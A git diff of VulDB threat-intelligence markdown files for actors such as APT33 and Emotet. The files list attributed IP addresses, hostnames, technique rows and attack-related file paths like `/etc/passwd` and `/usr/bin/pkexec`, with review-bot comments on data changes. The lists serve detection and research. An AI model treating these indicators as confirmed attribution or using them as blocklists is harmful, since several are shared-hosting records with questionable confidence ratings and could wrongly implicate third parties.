Update
This commit is contained in:
parent
0c11dcfc85
commit
22f05d0892
|
@ -57,7 +57,7 @@ ID | IP address | Hostname | Confidence
|
|||
23 | 46.148.17.227 | - | High
|
||||
24 | 46.166.162.90 | - | High
|
||||
25 | 46.183.217.74 | ip-217-74.dataclub.info | High
|
||||
26 | 51.38.128.110 | - | High
|
||||
26 | 51.38.128.110 | vps-b7b05fc8.vps.ovh.net | High
|
||||
27 | 51.254.76.54 | - | High
|
||||
28 | 51.254.158.57 | - | High
|
||||
29 | 54.37.104.106 | piber.connectedlists.com | High
|
||||
|
|
|
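Review bot: row 26 (`51.38.128.110`) gains the hostname `vps-b7b05fc8.vps.ovh.net` while its Confidence stays High; that is an OVH VPS reverse-DNS label that is reassigned together with the VPS, so the table should carry the date the lookup was made (or a first-seen/last-seen pair), otherwise the next regeneration silently overwrites it again and this change cannot be reproduced or compared. The same applies to row 25's `ip-217-74.dataclub.info`, which is the provider's PTR pattern for that address rather than a name the actor chose.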
@ -1,6 +1,6 @@
|
|||
# APT33 - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [APT33](https://vuldb.com/?actor.apt33). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [APT33](https://vuldb.com/?actor.apt33). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.apt33](https://vuldb.com/?actor.apt33)
|
||||
|
||||
|
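Review bot: the intro sentence's link target moves from `https://vuldb.com/?doc.cti` to `https://vuldb.com/?kb.cti`, and the identical `?doc.` to `?kb.` rewrite recurs in every actor file in this commit, but the message is just `Update`; a site-wide relink should be its own commit with a message naming the migration, so the indicator data changes elsewhere in this diff can be reviewed on their own. Also worth confirming that `?doc.cti` redirects to `?kb.cti`, because the unchanged link text `[VulDB CTI analysis]` gives a reader no hint that the path changed.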
@ -16,12 +16,12 @@ The following campaigns are known and can be associated with APT33:
|
|||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with APT33:
|
||||
|
||||
* SV
|
||||
* FR
|
||||
* DE
|
||||
* ES
|
||||
* PL
|
||||
* ...
|
||||
|
||||
There are 18 more country items available. Please use our online service to access the data.
|
||||
There are 4 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
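Review bot: the trailing line drops from `There are 18 more country items` to `There are 4 more`, which with the five visible entries (SV, FR, DE, ES, PL) takes the associated-country set from 23 to 9 while the visible list itself is unchanged; a cut of that size is a data change, not an `Update`, and the commit message should say what was reprocessed (new time window, dropped source, changed threshold). Since the intro sentence still covers both direct (origin of attacks) and indirect (proxy) association, a reader also cannot tell which kind was removed.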
@ -44,14 +44,9 @@ ID | IP address | Hostname | Confidence
|
|||
13 | 8.26.21.223 | mail5.boldinbox.com | High
|
||||
14 | 31.7.62.48 | - | High
|
||||
15 | 37.48.105.178 | - | High
|
||||
16 | 45.32.186.33 | 45.32.186.33.vultr.com | Medium
|
||||
17 | 45.76.32.252 | 45.76.32.252.vultr.com | Medium
|
||||
18 | 51.77.11.46 | ip46.ip-51-77-11.eu | High
|
||||
19 | 51.254.71.223 | ip223.ip-51-254-71.eu | High
|
||||
20 | 54.36.73.108 | mail.snap-status.com | High
|
||||
21 | ... | ... | ...
|
||||
16 | ... | ... | ...
|
||||
|
||||
There are 55 more IOC items available. Please use our online service to access the data.
|
||||
There are 60 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
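Review bot: the IOC excerpt shrinks from 20 rows to 15 (`21 | ...` becomes `16 | ...`) while the trailing count rises from `55 more` to `60 more`, so the total stays at 75 and rows 16-20 (the two `vultr.com` entries rated Medium, `ip46.ip-51-77-11.eu`, `ip223.ip-51-254-71.eu` and `mail.snap-status.com`) have only fallen below the cutoff, not out of the dataset. If the excerpt is now sized by output length rather than by a fixed row count, say so in the README or the generator, because anyone diffing two versions of this file will otherwise read this as five indicators being withdrawn.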
@ -59,14 +54,12 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us
|
|||
|
||||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1008 | Algorithm Downgrade | High
|
||||
2 | T1040 | Authentication Bypass by Capture-replay | High
|
||||
3 | T1059.007 | Cross Site Scripting | High
|
||||
4 | T1068 | Execution with Unnecessary Privileges | High
|
||||
5 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
6 | ... | ... | ...
|
||||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 11 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
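Review bot: the Description column does not carry the ATT&CK titles of the technique IDs beside it: the removed rows pair `T1008` with `Algorithm Downgrade` and `T1040` with `Authentication Bypass by Capture-replay`, and the surviving rows pair `T1059.007` with `Cross Site Scripting`, `T1068` with `Execution with Unnecessary Privileges` and `T1110.001` with `Improper Restriction of Excessive Authentication Attempts`; those are CWE weakness names (in ATT&CK, T1008 is Fallback Channels and T1040 is Network Sniffing), so either rename the column to `Weakness` or add the ATT&CK title next to it, otherwise anyone importing this table into a Navigator layer will mislabel the techniques. Separately, the two removed rows plus the count change (`11 more` to `8 more`) take the TTP set from 16 to 11 entries, which the `Update` message does not explain.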
@ -74,19 +67,32 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `$SPLUNK_HOME/etc/splunk-launch.conf` | High
|
||||
2 | File | `%PROGRAMDATA%\1E\Client` | High
|
||||
3 | File | `%PROGRAMDATA%\ASUS\GamingCenterLib` | High
|
||||
4 | File | `%PROGRAMDATA%\WrData\PKG` | High
|
||||
5 | File | `%PROGRAMFILES(X86)%/Aternity Information Systems/Assistant/plugins` | High
|
||||
6 | File | `.folder` | Low
|
||||
7 | File | `.forward` | Medium
|
||||
8 | File | `.git/hooks/post-update` | High
|
||||
9 | File | `.gitlab-ci.yml` | High
|
||||
10 | File | `.htaccess` | Medium
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/admin/upload.php` | High
|
||||
2 | File | `/api/ZRMesh/set_ZRMesh` | High
|
||||
3 | File | `/appliance/shiftmgn.php` | High
|
||||
4 | File | `/damicms-master/admin.php?s=/Article/doedit` | High
|
||||
5 | File | `/etc/quagga` | Medium
|
||||
6 | File | `/fw/index2.do` | High
|
||||
7 | File | `/jerry-core/ecma/base/ecma-lcache.c` | High
|
||||
8 | File | `/jerry-core/ecma/base/ecma-literal-storage.c` | High
|
||||
9 | File | `/jerry-core/jmem/jmem-heap.c` | High
|
||||
10 | File | `/moddable/xs/sources/xsScript.c` | High
|
||||
11 | File | `/parser/js/js-parser-expr.c` | High
|
||||
12 | File | `/preferences/tags` | High
|
||||
13 | File | `/thruk/#cgi-bin/extinfo.cgi?type=2` | High
|
||||
14 | File | `/thruk/#cgi-bin/status.cgi?style=combined` | High
|
||||
15 | File | `/transmission/web/` | High
|
||||
16 | File | `/uploads/exam_question/` | High
|
||||
17 | File | `/usr/bin/pkexec` | High
|
||||
18 | File | `AccessPoint.java` | High
|
||||
19 | File | `acknow.php` | Medium
|
||||
20 | File | `acropora/app/identity/ic.c` | High
|
||||
21 | File | `acropora/app/identity/identity_support.c` | High
|
||||
22 | File | `actions.php` | Medium
|
||||
23 | File | `admin/bad.php` | High
|
||||
24 | ... | ... | ...
|
||||
|
||||
There are 4716 more IOA items available. Please use our online service to access the data.
|
||||
There are 199 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
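Review bot: the trailing count falls from `4716 more` to `199 more`, so counting the visible rows the IOA set goes from 4726 to 222 entries, and the entire first page is replaced: every old row started with `$`, `%` or `.` (`$SPLUNK_HOME/etc/splunk-launch.conf`, `%PROGRAMDATA%\1E\Client`, `.git/hooks/post-update`, `.htaccess`) and none of those prefixes survives, although under the ordering the old page used (where `$`, `%` and `.` sort ahead of `/`) they would still head the list, so they were removed rather than reordered unless the sort changed too. A 95% reduction needs a reason in the commit message. Two of the new rows also cannot work as `File` indicators as written: `/thruk/#cgi-bin/extinfo.cgi?type=2` and `/thruk/#cgi-bin/status.cgi?style=combined` contain a `#`, and everything after a fragment marker is never sent to the server, so neither string can appear in a web-server log; check whether the `#` is a transcription artifact, and move query strings such as `?type=2` and the one in `/damicms-master/admin.php?s=/Article/doedit` into their own column.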
@ -103,9 +109,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
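Review bot: the License line bumps the range to `1997-2022` and rewrites four links (`?doc.changelog`, `?doc.about`, `?doc.faq`, `?doc`) to their `?kb.` forms while leaving the Creative Commons URL and `?contact` alone, which is consistent; the one target to double-check is `[documentation](https://vuldb.com/?kb)`, since it is the only link here whose new value is a bare namespace rather than a named page. The reference entry above changes `?doc.cti` to `?kb.cti` in the same way; bundling this relink with the indicator changes in one `Update` commit makes the data diff harder to review, so split them next time.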
@ -92,7 +92,8 @@ ID | Type | Indicator | Confidence
|
|||
32 | File | `admin/index.php` | High
|
||||
33 | File | `admin/index.php?n=ui_set&m=admin&c=index&a=doget_text_content&table=lang&field=1` | High
|
||||
34 | File | `admin/system_manage/save.html` | High
|
||||
35 | ... | ... | ...
|
||||
35 | File | `ajax.php` | Medium
|
||||
36 | ... | ... | ...
|
||||
|
||||
There are 304 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
|
|
|
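Review bot: a new visible row `35 | File | ajax.php | Medium` is added and the placeholder shifts to `36 | ...`, but the trailing line still reads `There are 304 more IOA items`; if `ajax.php` was already among the 304 the count should now be 303, and if it is genuinely new the total grew from 338 to 339 and the commit message should say so. Either way the visible rows and the counter should be regenerated together, not edited independently.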
@ -1,6 +1,6 @@
|
|||
# BelialDemon - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [BelialDemon](https://vuldb.com/?actor.belialdemon). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [BelialDemon](https://vuldb.com/?actor.belialdemon). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.belialdemon](https://vuldb.com/?actor.belialdemon)
|
||||
|
||||
|
@ -46,8 +46,9 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `include/ajax.draft.php` | High
|
||||
2 | Argument | `request` | Low
|
||||
1 | File | `AdminBaseController.class.php` | High
|
||||
2 | File | `include/ajax.draft.php` | High
|
||||
3 | Argument | `request` | Low
|
||||
|
||||
## References
|
||||
|
||||
|
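Review bot: `AdminBaseController.class.php` enters as row 1 at `High` while `request` (row 3) stays `Low` and `include/ajax.draft.php` is `High`; across the tables in this diff, Confidence lines up with the length of the indicator string (short tokens such as `request`, `score` and `/tmp` are Low, 8-11 character names such as `ajax.php`, `index.php` and `/etc/passwd` are Medium, anything longer is High) rather than with how specific the indicator is, and a bare class-file name like this one is far less specific than a path. If the column is a string-length heuristic, document that in the section intro so that nobody feeds the `High` rows into a blocklist as vetted indicators.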
@ -59,9 +60,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -97,7 +97,7 @@ ID | Type | Indicator | Confidence
|
|||
30 | File | `ActiveServices.java` | High
|
||||
31 | ... | ... | ...
|
||||
|
||||
There are 260 more IOA items available. Please use our online service to access the data.
|
||||
There are 262 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# DeathClick - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [DeathClick](https://vuldb.com/?actor.deathclick). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [DeathClick](https://vuldb.com/?actor.deathclick). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.deathclick](https://vuldb.com/?actor.deathclick)
|
||||
|
||||
|
@ -28,9 +28,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Desert Falcons - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Desert Falcons](https://vuldb.com/?actor.desert_falcons). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Desert Falcons](https://vuldb.com/?actor.desert_falcons). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.desert_falcons](https://vuldb.com/?actor.desert_falcons)
|
||||
|
||||
|
@ -37,10 +37,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `ftpcmd.c` | Medium
|
||||
2 | File | `kernel/events/core.c` | High
|
||||
3 | File | `PresentSpace.jsp` | High
|
||||
4 | File | `staff/register.php` | High
|
||||
5 | Argument | `ConnPoolName/GroupId` | High
|
||||
6 | Argument | `cpfr/cpto` | Medium
|
||||
7 | Argument | `First Name/Last Name` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 4 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
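Review bot: rows 4-7 (`staff/register.php` and the three `Argument` rows `ConnPoolName/GroupId`, `cpfr/cpto` and `First Name/Last Name`) are removed and replaced by the `4 | ...` placeholder, while the trailing `There are 4 more IOA items` line is shown as unchanged; if that count really did not move, these are deletions from the dataset (11 entries down to 7) rather than a shorter excerpt, and they take every non-`File` row with them. The commit message should say why the argument-level indicators were withdrawn, since they were the only rows that said how the listed files are attacked.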
@ -52,9 +51,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -9,11 +9,11 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac
|
|||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Emotet:
|
||||
|
||||
* VN
|
||||
* CN
|
||||
* US
|
||||
* CN
|
||||
* ...
|
||||
|
||||
There are 5 more country items available. Please use our online service to access the data.
|
||||
There are 7 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
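Review bot: `US` now appears ahead of `CN` at the top of the country list and the trailing count goes from `5 more` to `7 more`, but the list carries no ranking key, so a reader cannot tell whether the US is newly associated with Emotet or merely re-sorted; the intro sentence (`directly ... or indirectly ... associated with Emotet`) should state the ordering criterion, for example the number of IOC entries per country, and ideally the list should show that number beside each code.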
@ -36,7 +36,7 @@ ID | IP address | Hostname | Confidence
|
|||
13 | 5.89.33.136 | net-5-89-33-136.cust.vodafonedsl.it | High
|
||||
14 | 5.196.35.138 | vps10.open-techno.net | High
|
||||
15 | 5.230.193.41 | casagarcia-web.sys.netzfabrik.eu | High
|
||||
16 | 8.4.9.137 | host-8-4-9-137.onlinehorizons.net | High
|
||||
16 | 8.4.9.137 | onlinehorizons.net | High
|
||||
17 | 12.32.68.154 | mail.sealscoinc.com | High
|
||||
18 | 12.149.72.170 | - | High
|
||||
19 | 12.162.84.2 | - | High
|
||||
|
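Review bot: row 16 changes the hostname of `8.4.9.137` from `host-8-4-9-137.onlinehorizons.net`, a reverse-DNS label for that one address, to the bare `onlinehorizons.net`, which is its parent domain; the Hostname column now mixes PTR records with apex domains, and anyone turning this table into a block rule would go from blocking one host to blocking the whole domain, which from the old label looks like the hosting provider's own. Keep the PTR as looked up (or `-` if it no longer resolves) and put domain-level pivots in a separate column.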
@ -141,7 +141,7 @@ ID | Technique | Description | Confidence
|
|||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 9 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -149,28 +149,28 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `./clients/client` | High
|
||||
2 | File | `/?ajax-request=jnews` | High
|
||||
3 | File | `/assets/ctx` | Medium
|
||||
4 | File | `/config/getuser` | High
|
||||
1 | File | `/?ajax-request=jnews` | High
|
||||
2 | File | `/ajax_crud` | Medium
|
||||
3 | File | `/appliance/users?action=edit` | High
|
||||
4 | File | `/assets/ctx` | Medium
|
||||
5 | File | `/core/table/query` | High
|
||||
6 | File | `/dev/ion` | Medium
|
||||
7 | File | `/ecma/operations/ecma-objects.c` | High
|
||||
8 | File | `/enduserreg` | Medium
|
||||
9 | File | `/forum/away.php` | High
|
||||
10 | File | `/GetCopiedFile` | High
|
||||
11 | File | `/goform/activate_process` | High
|
||||
12 | File | `/hdf5/src/H5T.c` | High
|
||||
8 | File | `/forum/away.php` | High
|
||||
9 | File | `/GetCopiedFile` | High
|
||||
10 | File | `/goform/activate_process` | High
|
||||
11 | File | `/hdf5/src/H5T.c` | High
|
||||
12 | File | `/include/chart_generator.php` | High
|
||||
13 | File | `/jerry-core/ecma/base/ecma-gc.c` | High
|
||||
14 | File | `/jerry-core/ecma/base/ecma-helpers-conversion.c` | High
|
||||
15 | File | `/jerry-core/ecma/base/ecma-lcache.c` | High
|
||||
16 | File | `/jerry-core/ecma/operations/ecma-objects.c` | High
|
||||
17 | File | `/jerry-core/vm/vm.c` | High
|
||||
18 | File | `/mobile/SelectUsers.jsp` | High
|
||||
19 | File | `/ms/mdiy/model/importJson.do` | High
|
||||
18 | File | `/ms/mdiy/model/importJson.do` | High
|
||||
19 | File | `/ms/template/writeFileContent.do` | High
|
||||
20 | ... | ... | ...
|
||||
|
||||
There are 166 more IOA items available. Please use our online service to access the data.
|
||||
There are 167 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
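Review bot: rows 7 and 16 list the same source file under two path forms, `/ecma/operations/ecma-objects.c` and `/jerry-core/ecma/operations/ecma-objects.c`, and the removed row 1 `./clients/client` used a third, relative form; normalise paths (strip `./`, use one repository-relative form) before deduplicating, otherwise the count (`166 more` to `167 more`) overstates the set. The new row `/appliance/users?action=edit` also joins the `File` type with a query string attached, like the existing `/?ajax-request=jnews`; either split the query into its own column or rename the type to something like `Path`.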
@ -1,6 +1,6 @@
|
|||
# EvilBunny - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [EvilBunny](https://vuldb.com/?actor.evilbunny). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [EvilBunny](https://vuldb.com/?actor.evilbunny). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.evilbunny](https://vuldb.com/?actor.evilbunny)
|
||||
|
||||
|
@ -25,12 +25,9 @@ ID | IP address | Hostname | Confidence
|
|||
2 | 8.5.1.34 | - | High
|
||||
3 | 64.15.136.137 | - | High
|
||||
4 | 66.45.225.11 | - | High
|
||||
5 | 67.19.22.234 | ip1.brainstemprojects.com | High
|
||||
6 | 67.19.84.46 | 2e.54.1343.static.theplanet.com | High
|
||||
7 | 68.178.232.99 | parkwebwin-v02.prod.mesa1.secureserver.net | High
|
||||
8 | ... | ... | ...
|
||||
5 | ... | ... | ...
|
||||
|
||||
There are 13 more IOC items available. Please use our online service to access the data.
|
||||
There are 16 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
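Review bot: the visible rows shrink from 7 to 4 (`8 | ...` becomes `5 | ...`) and the count rises from `13 more` to `16 more`, so the total is still 20 and rows 5-7 (`ip1.brainstemprojects.com`, `2e.54.1343.static.theplanet.com`, `parkwebwin-v02.prod.mesa1.secureserver.net`) merely fell below the cutoff. That cutoff now differs from file to file within this one commit (the APT33 IOC table keeps 15 rows, this one 4), which suggests the excerpt is sized by output length rather than by row count; a fixed row count would make successive versions of these files diffable.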
@ -56,14 +53,9 @@ ID | Type | Indicator | Confidence
|
|||
3 | File | `/etc/passwd` | Medium
|
||||
4 | File | `/getcfg.php` | Medium
|
||||
5 | File | `forumrunner/includes/moderation.php` | High
|
||||
6 | File | `fs/inode.c` | Medium
|
||||
7 | File | `includes/class.rest-api.php` | High
|
||||
8 | File | `index.cgi` | Medium
|
||||
9 | File | `index.php` | Medium
|
||||
10 | File | `libavcodec/gif.c` | High
|
||||
11 | ... | ... | ...
|
||||
6 | ... | ... | ...
|
||||
|
||||
There are 31 more IOA items available. Please use our online service to access the data.
|
||||
There are 38 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
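Review bot: `/etc/passwd` (row 3, Medium), `index.cgi` and `index.php` exist on essentially every Unix host or web server, so as `File` indicators on their own they match everything and carry no actor signal; rows such as `fs/inode.c` and `libavcodec/gif.c` make it clear these are source files from vulnerability records rather than artifacts to hunt for on a host, and the section intro (`potential fragments used for technical activities`) should say that plainly, or each file should be paired with the product it belongs to. The excerpt also drops from 10 rows to 5 while the total grows from 41 to 43 (`31 more` to `38 more`), so the two added entries are invisible in this diff.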
@ -75,9 +67,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -20,7 +20,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
|
|||
* FR
|
||||
* ...
|
||||
|
||||
There are 27 more country items available. Please use our online service to access the data.
|
||||
There are 28 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -37,7 +37,7 @@ ID | IP address | Hostname | Confidence
|
|||
7 | 5.61.32.118 | - | High
|
||||
8 | 5.61.38.52 | - | High
|
||||
9 | 5.135.73.113 | - | High
|
||||
10 | 5.149.250.235 | snigist.co.uk | High
|
||||
10 | 5.149.250.235 | quoll.tellfex.com | High
|
||||
11 | 5.149.250.241 | flipveranda.co.uk | High
|
||||
12 | 5.149.252.144 | - | High
|
||||
13 | 5.149.253.126 | - | High
|
||||
|
